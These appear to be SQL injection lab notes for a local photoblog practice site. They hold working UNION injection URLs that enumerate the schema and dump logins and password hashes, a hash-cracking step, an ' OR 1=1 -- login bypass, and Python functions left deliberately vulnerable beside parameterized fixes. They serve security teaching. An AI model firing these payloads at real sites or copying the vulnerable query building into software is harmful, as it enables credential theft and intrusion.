SQL INJECTION QUICK NOTES

WORKING WITH BACK END DATABASE:

mysql -u root
    Connects to the MySQL database management system.
show databases;
    Show databases.
use photoblog;
    Select the photoblog database.
show tables;
    Show tables.
select * from users;
    Show "users" table content.
select * from pictures;
    Show "pictures" table content.
show columns from users;
    Show users table structure.
show columns from pictures;
    Show pictures table structure.
select * from pictures union select * from users;
    Show an error: the two select queries have a different number of columns.
select title from pictures union select login from users;
    Show column title from pictures concatenated with column login from users.
select title,img from pictures union select login,password from users;
    Show columns title,img from pictures concatenated with columns login,password from users.
quit
    Quits mysql.
ifconfig
    Get the IP address of the machine.
WORKING WITH FRONT END WEB SITE:

In what follows, replace the IP address with your machine's IP address.

http://192.168.1.144/cat.php?id=1
    ===> select * from pictures where cat=1
    ==> Show pictures of category 1
http://192.168.1.144/cat.php?id=2
    ===> select * from pictures where cat=2
    ==> Show the other pictures, those of category 2
http://192.168.1.144/cat.php?id=2%
    ===> select * from pictures where cat=2%
    ==> Show Error
http://192.168.1.144/cat.php?id=2-1
    ===> select * from pictures where cat=2-1
    ==> Show pictures of category 1
http://192.168.1.144/cat.php?id=1+1
    ===> select * from pictures where cat=1 + 1
    ==> Show Error (in a URL the + character is decoded as a space, so the back end never receives an addition)
http://192.168.1.144/cat.php?id=1 union select 1
    ===> select * from pictures where cat=1 union select 1
    ==> Show error: the number of columns in the left select statement is different from the right select statement
http://192.168.1.144/cat.php?id=1 union select 1,2
    ===> select * from pictures where cat=1 union select 1,2
    ==> Show error: the number of columns in the left select statement is different from the right select statement
http://192.168.1.144/cat.php?id=1 union select 1,2,3
    ===> select * from pictures where cat=1 union select 1,2,3
    ==> Show error: the number of columns in the left select statement is different from the right select statement
http://192.168.1.144/cat.php?id=1 union select 1,2,3,4
    ===> select * from pictures where cat=1 union select 1,2,3,4
    ==> No error: the left select statement has 4 columns.
    The image and the image title shown on the page come from column number 2 of the left and right select statements.
    The hacker could therefore use column number 2 of the injected select as the input in the URL and read its value back in the page.
http://192.168.1.144/cat.php?id=1 union select 1,@@version,3,4
    ==> Show the MySQL version
http://192.168.1.144/cat.php?id=1 union select 1,current_user(),3,4
    ==> Show the current MySQL user
http://192.168.1.144/cat.php?id=1 union select 1,database(),3,4
    ==> Show the database currently in use: photoblog
http://192.168.1.144/cat.php?id=1 union select 1,table_name,3,4 from information_schema.tables
    ==> Show the names of all tables known to the MySQL DBMS.
    The application's own tables are clearly visible among them: categories, pictures and users.
http://192.168.1.144/cat.php?id=1 union select 1,column_name,3,4 from information_schema.columns
    ==> Show the names of all table columns known to the MySQL DBMS.
    The columns login and password, which belong to the table users, are clearly visible.
http://192.168.1.144/cat.php?id=1 union select 1,login,3,4 from users
    ==> The hacker can read the user logins easily.
http://192.168.1.144/cat.php?id=1 union select 1,password,3,4 from users
    ==> The hacker can read the user passwords easily. Here the password is encrypted (stored as a hash, not in clear text).
http://192.168.1.144/cat.php?id=1 union select 1,concat(login, %27:%27, password),3,4 from users
    ==> The hacker can read login and password together, separated by a colon (%27 is the URL encoding of the single quote). Here the password is encrypted (stored as a hash, not in clear text).
Open the website www.md5online.org and try to decrypt the encrypted password.
The password is "P4ssw0d".
SIMPLE EXERCISE:

In the following section we will create our own table and try to hack it.

mysql -u root
    Connects to the MySQL database management system.
use photoblog;
    Select the photoblog database.
CREATE TABLE employee (employee_name varchar(250), employee_job varchar(250));
    Creates the table employee.
INSERT INTO employee (employee_name, employee_job) VALUES ('Ali Baba', 'cartoon');
    Insert the first record into the employee table.
INSERT INTO employee (employee_name, employee_job) VALUES ('Samir Sabri', 'actor');
    Insert the second record into the employee table.
SELECT * from employee;
    View the employee table content.
Go back to the browser and continue.

http://192.168.1.144/cat.php?id=1 union select 1,employee_name,3,4 from employee
    ==> Show employee names.
http://192.168.1.144/cat.php?id=1 union select 1,concat(employee_name, %27:%27,employee_job),3,4 from employee
    ==> Show employee names and jobs.
Hacking techniques on the login page:

If you enter login=jsmith and password=demo1234, the query in the back end becomes:
    SELECT * from users where login='jsmith' and password='demo1234';
If you enter login=' and password=a, the query in the back end becomes:
    SELECT * from users where login=''' and password='a';
    (the quotes are now unbalanced, so the database reports a syntax error)
If you enter login=' OR 1=1 -- and password=demo1234, the query in the back end becomes:
    SELECT * from users where login='' OR 1=1 --' and password='demo1234';
    (everything after -- is a comment, and 1=1 is always true, so the password check is bypassed)
Parametrized queries:

// conn is an open java.sql.Connection to the photoblog database
String query = "SELECT * FROM users WHERE login = ? AND password = ?";
PreparedStatement pstmt = conn.prepareStatement(query);
pstmt.setString(1, "' OR 1=1 --");
pstmt.setString(2, "demo1234");
ResultSet rs = pstmt.executeQuery();

===> SQL will search for users whose login is literally ' OR 1=1 -- and whose password is demo1234. The injected text is bound as a value and is never parsed as part of the SQL statement.
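The two weaknesses walked through above (the cat.php id parameter and the login form) and the parameterized fix, shown side by side as an added example that is not part of the original notes. It uses Python's sqlite3 module with a constructed in-memory copy of the photoblog tables; the row contents are made up, the MySQL-specific functions (@@version, information_schema) are not reproduced.

```python
import sqlite3

# Constructed in-memory stand-in for the photoblog database used in the notes.
# Table and column names follow the notes; the rows are made up for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pictures (id INTEGER, title TEXT, img TEXT, cat INTEGER);
        CREATE TABLE users (id INTEGER, login TEXT, password TEXT);
        INSERT INTO pictures VALUES (1, 'Tree', 'tree.jpg', 1), (2, 'Rock', 'rock.jpg', 2);
        INSERT INTO users VALUES (1, 'admin', 'secret'), (2, 'jsmith', 'demo1234');
    """)
    return db

def cat_vulnerable(db, id_param):
    # cat.php as the notes describe it: the id parameter is pasted into the SQL text,
    # so "2-1" is evaluated by the database and "1 union select ..." appends a query.
    return db.execute("select * from pictures where cat=" + id_param).fetchall()

def cat_hardened(db, id_param):
    # Validate the type first (a category id is an integer), then bind it as a parameter.
    # "2%", "2-1" and "1 union select ..." are all rejected before any SQL runs.
    try:
        cat = int(id_param)
    except ValueError:
        return []
    return db.execute("select * from pictures where cat=?", (cat,)).fetchall()

def login_vulnerable(db, login, password):
    # The login page from the notes: a quote in the input ends the string literal early,
    # so a lone ' breaks the syntax and ' OR 1=1 -- turns the WHERE clause into "always true".
    query = "SELECT * from users where login='%s' and password='%s'" % (login, password)
    return db.execute(query).fetchall()

def login_hardened(db, login, password):
    # Parameterized form: the values are passed separately from the SQL text, so
    # ' OR 1=1 -- is compared against the login column as a plain string and matches nobody.
    return db.execute("SELECT * from users where login=? and password=?",
                      (login, password)).fetchall()
```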